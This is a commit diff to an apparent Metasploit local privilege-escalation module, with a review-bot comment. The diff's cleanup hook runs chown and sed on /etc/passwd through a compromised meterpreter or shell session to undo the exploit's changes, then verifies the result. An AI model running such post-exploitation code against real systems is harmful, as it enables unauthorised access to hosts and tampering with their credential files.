Support cleanup for meterpreter sessions
parent
74ab02f27b
commit
e158ccb20b
|
@ -174,16 +174,65 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
def on_new_session(session)
|
def on_new_session(session)
|
||||||
# Reinstate /etc/passwd ownership
|
if session.type.to_s.eql? 'meterpreter'
|
||||||
session.shell_command_token "chown root:root #{@chown_file}"
|
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
|
||||||
|
|
||||||
# Remove new user
|
|
||||||
session.shell_command_token "sed -i 's/^#{@username}.*$//g' #{@chown_file}"
|
|
||||||
passwd = session.shell_command_token "grep #{@username} #{@chown_file}"
|
|
||||||
if passwd.include? @username
|
|
||||||
print_warning "Could not remove user '#{@username}' from #{@chown_file}"
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Reinstate /etc/passwd root ownership and remove new user
|
||||||
|
root_owns_passwd = false
|
||||||
|
new_user_removed = false
|
||||||
|
|
||||||
|
if session.type.to_s.eql? 'meterpreter'
|
||||||
|
# Reinstate /etc/passwd root ownership
|
||||||
|
session.sys.process.execute '/bin/sh', "-c \"chown root:root #{@chown_file}\""
|
||||||
|
|
||||||
|
# Remove new user
|
||||||
|
session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\""
|
||||||
|
|
||||||
|
# Wait for clean up
|
||||||
|
Rex.sleep 5
|
||||||
|
|
||||||
|
# Check root ownership
|
||||||
|
passwd_stat = session.fs.file.stat(@chown_file).stathash
|
||||||
|
if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0
|
||||||
|
root_owns_passwd = true
|
||||||
|
end
|
||||||
|
|
||||||
|
# Check for new user in /etc/passwd
|
||||||
|
passwd_contents = session.fs.file.open(@chown_file).read.to_s
|
||||||
|
unless passwd_contents.include? "#{@username}:"
|
||||||
|
new_user_removed = true
|
||||||
|
end
|
||||||
|
elsif session.type.to_s.eql? 'shell'
|
||||||
|
# Reinstate /etc/passwd root ownership
|
||||||
|
session.shell_command_token "chown root:root #{@chown_file}"
|
||||||
|
|
||||||
|
# Remove new user
|
||||||
|
session.shell_command_token "sed -i 's/^#{@username}:.*$//g' #{@chown_file}"
|
||||||
|
|
||||||
|
# Check root ownership
|
||||||
|
passwd_owner = session.shell_command_token "ls -l #{@chown_file}"
|
||||||
|
if passwd_owner.to_s.include? 'root'
|
||||||
|
root_owns_passwd = true
|
||||||
|
end
|
||||||
|
|
||||||
|
# Check for new user in /etc/passwd
|
||||||
|
passwd_user = session.shell_command_token "grep '#{@username}:' #{@chown_file}"
|
||||||
|
unless passwd_user.to_s.include? "#{@username}:"
|
||||||
|
new_user_removed = true
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
unless root_owns_passwd
|
||||||
|
print_warning "Could not reinstate root ownership of #{@chown_file}"
|
||||||
|
end
|
||||||
|
|
||||||
|
unless new_user_removed
|
||||||
|
print_warning "Could not remove user '#{@username}' from #{@chown_file}"
|
||||||
|
end
|
||||||
|
rescue => e
|
||||||
|
print_error "Error during cleanup: #{e.message}"
|
||||||
|
ensure
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
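Review bot: The shell-session ownership check `passwd_owner.to_s.include? 'root'` is satisfied by any occurrence of `root` in the `ls -l` output, so it reports success when only the group column is root (or the path contains that string) and the owner was never restored; the `Could not reinstate root ownership` warning then never fires in the case it exists for. Comparing numeric ids, as the meterpreter branch already does with `st_uid`/`st_gid`, is stricter: `passwd_owner = session.shell_command_token "stat -c '%u:%g' #{@chown_file}"` followed by `root_owns_passwd = passwd_owner.to_s.strip == '0:0'` (this assumes GNU `stat` is present on the target). Separately, both `sed` calls replace the matched line with nothing, which leaves an empty line in the file rather than deleting the entry; the address form `/^#{@username}:/d` would remove the line itself.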